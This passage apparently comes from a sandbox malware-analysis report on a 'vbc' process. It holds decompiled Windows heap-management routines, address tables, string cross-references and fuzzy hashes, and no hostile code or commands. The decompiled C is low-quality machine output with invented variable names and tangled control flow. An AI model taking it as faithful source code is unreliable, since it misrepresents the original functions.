                                                  0x015c3deb
                                                  0x015c3df7
                                                  0x015c3dfc
                                                  0x015c3dfe
                                                  0x015c3e01
                                                  0x015c3e01
                                                  0x015c3e06
                                                  0x0161824d
                                                  0x0161824f
                                                  0x01618254
                                                  0x00000000
                                                  0x015c3e0c
                                                  0x015c3e11
                                                  0x015c3e16
                                                  0x015c3e19
                                                  0x015c3e29
                                                  0x015c3e2c
                                                  0x015c3e2f
                                                  0x0161825c
                                                  0x0161825f
                                                  0x01618261
                                                  0x01618264
                                                  0x0161826c
                                                  0x01618280
                                                  0x01618282
                                                  0x01618282
                                                  0x01618289
                                                  0x01618290
                                                  0x01618293
                                                  0x01618294
                                                  0x01618298
                                                  0x0161829b
                                                  0x0161829b
                                                  0x015c3e35
                                                  0x015c3e38
                                                  0x015c3e3d
                                                  0x015c3e44
                                                  0x015c3e58
                                                  0x016182a3
                                                  0x016182a3
                                                  0x015c3e58
                                                  0x015c3e60
                                                  0x015c3e6f
                                                  0x015c3e74
                                                  0x015c3e77
                                                  0x015c3e77
                                                  0x015c3e7a
                                                  0x015c3e7f
                                                  0x015c3e8c
                                                  0x015c3e8c
                                                  0x015c3e91
                                                  0x00000000
                                                  0x015c3e91

                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 015C3F70
                                                  • Kernel-MUI-Language-Allowed, xrefs: 015C3DC0
                                                  • WindowsExcludedProcs, xrefs: 015C3D6F
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 015C3E97
                                                  • Kernel-MUI-Number-Allowed, xrefs: 015C3D8C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: acdf79900f83da0ceda71ad7e7910a0ab484080ac6de9e9b18cb8b7a61bcec33
                                                  • Instruction ID: 6bcbc99abf6313f2072f5b01d52223cbc7bea517ddc902993c3b4828110d89da
                                                  • Opcode Fuzzy Hash: acdf79900f83da0ceda71ad7e7910a0ab484080ac6de9e9b18cb8b7a61bcec33
                                                  • Instruction Fuzzy Hash: 26F13D72D0061AEFCB16DFD8C980EEEBBB9FF58A50F15445AE505AB250D7349E01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 29%
                                                  			E015B40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015BB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E015BB150(", passed to %s", _t29);
					}
					_push("\n");
					E015BB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x16a6378 = 1;
						asm("int3");
						 *0x16a6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                  0x015b40e6
                                                  0x015b40e8
                                                  0x015b40f1
                                                  0x0161042d
                                                  0x0161044c
                                                  0x01610451
                                                  0x0161042f
                                                  0x01610444
                                                  0x01610449
                                                  0x0161045d
                                                  0x01610466
                                                  0x0161046e
                                                  0x01610474
                                                  0x01610475
                                                  0x0161047a
                                                  0x0161048a
                                                  0x0161048c
                                                  0x01610493
                                                  0x01610494
                                                  0x01610494
                                                  0x00000000
                                                  0x0161049b
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                  • API String ID: 0-188067316
                                                  • Opcode ID: c9ff57b7e7fa3d5c8d4159d663c703bce3f58b3d4e9e90bd3aeb6e58f8b5fe61
                                                  • Instruction ID: e26aff268854412a0f07fcb4e138e29ce56fb2413bd0de323b1f7fb0386f709f
                                                  • Opcode Fuzzy Hash: c9ff57b7e7fa3d5c8d4159d663c703bce3f58b3d4e9e90bd3aeb6e58f8b5fe61
                                                  • Instruction Fuzzy Hash: 1C014C32141242EED7259769EC8DF9277A8FB40B30F1C802DF0054F741CBE89484C615
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DA830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E015DA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x16a8748 - 1;
					if( *0x16a8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
									_t260 = _t257 + 4;
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E015BB150();
								_t257 = _t260 + 4;
								__eflags =  *0x16a7bc8;
								if(__eflags == 0) {
									E01672073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0167A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0160D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E015DAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0167A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0167A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x16a8748 - 1;
					if( *0x16a8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E015BB150();
							} else {
								E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E015BB150();
							__eflags =  *0x16a7bc8;
							if(__eflags == 0) {
								_t131 = E01672073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                  0x015da83a
                                                  0x015da83c
                                                  0x015da83e
                                                  0x015da841
                                                  0x015da844
                                                  0x015da84a
                                                  0x015daa53
                                                  0x015daa59
                                                  0x015daa59
                                                  0x015da858
                                                  0x015da85e
                                                  0x015daaf5
                                                  0x015daafc
                                                  0x0162229e
                                                  0x016222a2
                                                  0x016222a8
                                                  0x016222b3
                                                  0x016222b5
                                                  0x016222bb
                                                  0x016222c1
                                                  0x016222c5
                                                  0x016222e6
                                                  0x016222eb
                                                  0x016222f0
                                                  0x016222c7
                                                  0x016222dc
                                                  0x016222e1
                                                  0x016222e1
                                                  0x016222f3
                                                  0x016222f8
                                                  0x016222fd
                                                  0x01622300
                                                  0x01622307
                                                  0x0162230e
                                                  0x0162230e
                                                  0x01622313
                                                  0x01622313
                                                  0x016222b5
                                                  0x016222a2
                                                  0x015daafc
                                                  0x015da864
                                                  0x015da869
                                                  0x015daa5c
                                                  0x015daa5e
                                                  0x015da86f
                                                  0x015da87f
                                                  0x015da885
                                                  0x015da885
                                                  0x015da88b
                                                  0x015da890
                                                  0x015da896
                                                  0x015dab0c
                                                  0x015dab0f
                                                  0x015dab15
                                                  0x01622320
                                                  0x01622320
                                                  0x015dab1b
                                                  0x015da89c
                                                  0x015da89f
                                                  0x015da8a2
                                                  0x015da8a2
                                                  0x015da8a5
                                                  0x015da8af
                                                  0x015da8b3
                                                  0x015da8b8
                                                  0x015daa66
                                                  0x015da8be
                                                  0x015da8c5
                                                  0x015da8c6
                                                  0x015da8ce
                                                  0x01622328
                                                  0x01622332
                                                  0x01622337
                                                  0x01622337
                                                  0x015da8ce
                                                  0x015da8d4
                                                  0x015da8d8
                                                  0x015da8db
                                                  0x015da8de
                                                  0x015da8e1
                                                  0x015da8e5
                                                  0x015da8e8
                                                  0x015da8f0
                                                  0x015da8f3
                                                  0x0162234c
                                                  0x01622350
                                                  0x01622355
                                                  0x01622359
                                                  0x01622359
                                                  0x015da8f9
                                                  0x015da901
                                                  0x015daae4
                                                  0x015daae4
                                                  0x015daaea
                                                  0x00000000
                                                  0x015da907
                                                  0x015da90a
                                                  0x015da91d
                                                  0x015da91d
                                                  0x00000000
                                                  0x015da910
                                                  0x015da910
                                                  0x015da910
                                                  0x015da914
                                                  0x015da924
                                                  0x015da924
                                                  0x015da924
                                                  0x015da924
                                                  0x015da916
                                                  0x015da91b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015da91b
                                                  0x015da925
                                                  0x015da925
                                                  0x015da932
                                                  0x015da936
                                                  0x015da93c
                                                  0x015da93c
                                                  0x015da93c
                                                  0x015dab22
                                                  0x015dab24
                                                  0x015dab27
                                                  0x015dab27
                                                  0x015da942
                                                  0x015da944
                                                  0x015daaba
                                                  0x015daabd
                                                  0x015daac0
                                                  0x015daac0
                                                  0x015daac2
                                                  0x015dab2f
                                                  0x015daac4
                                                  0x015daac4
                                                  0x015daac7
                                                  0x015daaca
                                                  0x015daacc
                                                  0x015daace
                                                  0x015daace
                                                  0x015daace
                                                  0x015daad1
                                                  0x015daad1
                                                  0x015daad7
                                                  0x015daad9
                                                  0x00000000
                                                  0x00000000
                                                  0x01622361
                                                  0x01622369
                                                  0x0162236b
                                                  0x00000000
                                                  0x01622371
                                                  0x00000000
                                                  0x01622371
                                                  0x00000000
                                                  0x0162236b
                                                  0x015daac0
                                                  0x015da94a
                                                  0x015da94a
                                                  0x015da94d
                                                  0x015da94d
                                                  0x015da950
                                                  0x015da954
                                                  0x01622376
                                                  0x01622380
                                                  0x015da95a
                                                  0x015da95a
                                                  0x015da95c
                                                  0x015da95f
                                                  0x015da961
                                                  0x015da961
                                                  0x015da967
                                                  0x015da96a
                                                  0x015da972
                                                  0x015daa02
                                                  0x015daa06
                                                  0x015daa10
                                                  0x015daa16
                                                  0x015daa16
                                                  0x015daa1b
                                                  0x015daa21
                                                  0x015daa24
                                                  0x015daa27
                                                  0x015daa29
                                                  0x015daa2c
                                                  0x015daa32
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015da978
                                                  0x015da978
                                                  0x015da97b
                                                  0x015da981
                                                  0x015da996
                                                  0x015da998
                                                  0x015da99f
                                                  0x015da9a2
                                                  0x0162238a
                                                  0x015da9a8
                                                  0x015da9a8
                                                  0x015da9a8
                                                  0x015da9aa
                                                  0x015da9ad
                                                  0x015da9b0
                                                  0x015da9bb
                                                  0x015da9be
                                                  0x015da9c7
                                                  0x015da9c9
                                                  0x015da9c9
                                                  0x015da9cc
                                                  0x015da9d1
                                                  0x015daa6d
                                                  0x015daa70
                                                  0x015daa73
                                                  0x015daa75
                                                  0x015daa79
                                                  0x015daa7e
                                                  0x015daa82
                                                  0x015daa8f
                                                  0x015daa94
                                                  0x015daa96
                                                  0x01622392
                                                  0x016223a1
                                                  0x016223a1
                                                  0x015daa9c
                                                  0x015daa9f
                                                  0x015daaa2
                                                  0x015daaa2
                                                  0x015daaa8
                                                  0x015daaab
                                                  0x015daaaf
                                                  0x00000000
                                                  0x015daab5
                                                  0x00000000
                                                  0x015daab5
                                                  0x015da9d7
                                                  0x015da9d7
                                                  0x015da9da
                                                  0x015da9e0
                                                  0x015da9e3
                                                  0x015da9e6
                                                  0x015da9e9
                                                  0x015da9eb
                                                  0x015da9fd
                                                  0x015da9fd
                                                  0x00000000
                                                  0x015da9eb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015da983
                                                  0x015da983
                                                  0x015da983
                                                  0x015da987
                                                  0x015da995
                                                  0x015da995
                                                  0x015da995
                                                  0x015da995
                                                  0x015da989
                                                  0x015da98e
                                                  0x00000000
                                                  0x015da990
                                                  0x00000000
                                                  0x015da990
                                                  0x015da98e
                                                  0x00000000
                                                  0x015da983
                                                  0x015da972
                                                  0x015da90a
                                                  0x015daa34
                                                  0x015daa34
                                                  0x015daa40
                                                  0x015daa43
                                                  0x015daa46
                                                  0x015daa4d
                                                  0x016223ab
                                                  0x016223b2
                                                  0x016223b8
                                                  0x016223be
                                                  0x016223c3
                                                  0x016223c5
                                                  0x016223cb
                                                  0x016223d1
                                                  0x016223d5
                                                  0x016223f6
                                                  0x016223fb
                                                  0x016223d7
                                                  0x016223ec
                                                  0x016223f1
                                                  0x01622403
                                                  0x01622408
                                                  0x01622410
                                                  0x01622417
                                                  0x01622422
                                                  0x01622422
                                                  0x01622417
                                                  0x016223c5
                                                  0x016223b2
                                                  0x00000000

                                                  Strings
                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01622403
                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016222F3
                                                  • HEAP: , xrefs: 016222E6, 016223F6
                                                  • HEAP[%wZ]: , xrefs: 016222D7, 016223E7
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                  • API String ID: 0-1657114761
                                                  • Opcode ID: 3ed7acab0b972d58e032e9fcb2cd51611fac81f6901b1f54037871bcbf663784
                                                  • Instruction ID: 56b53d8ade6fd6bdd3f157edab7b2f60d08c5bc091c69efcd4ce738c9e5dc3a2
                                                  • Opcode Fuzzy Hash: 3ed7acab0b972d58e032e9fcb2cd51611fac81f6901b1f54037871bcbf663784
                                                  • Instruction Fuzzy Hash: B9D1BC34A006468FDB29CF6CC890BBEBBF1BF88200F15856DD95A9B346E374E945CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DA229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E015DA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E015DDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E015F9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0167A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E015F9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E015BB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E015D7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0167138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E015D7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E015D7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01671582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E015D7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E015D7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01671582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0160D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                  0x015da229
                                                  0x015da231
                                                  0x015da23f
                                                  0x015da242
                                                  0x015da244
                                                  0x015da24c
                                                  0x015da255
                                                  0x015da25a
                                                  0x015da25f
                                                  0x01621c76
                                                  0x01621c78
                                                  0x01621c7e
                                                  0x01621c7f
                                                  0x01621c81
                                                  0x01621c82
                                                  0x01621c84
                                                  0x01621c89
                                                  0x01621c8b
                                                  0x01621c9e
                                                  0x01621c9e
                                                  0x01621cab
                                                  0x01621cb2
                                                  0x00000000
                                                  0x01621cb2
                                                  0x01621c8d
                                                  0x01621c92
                                                  0x00000000
                                                  0x00000000
                                                  0x01621c94
                                                  0x01621c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01621c98
                                                  0x015da265
                                                  0x015da265
                                                  0x015da266
                                                  0x015da26f
                                                  0x015da270
                                                  0x015da276
                                                  0x015da277
                                                  0x015da279
                                                  0x015da27e
                                                  0x015da282
                                                  0x01621db5
                                                  0x01621dbb
                                                  0x01621dc1
                                                  0x01621dc5
                                                  0x01621de4
                                                  0x01621de9
                                                  0x01621dc7
                                                  0x01621ddc
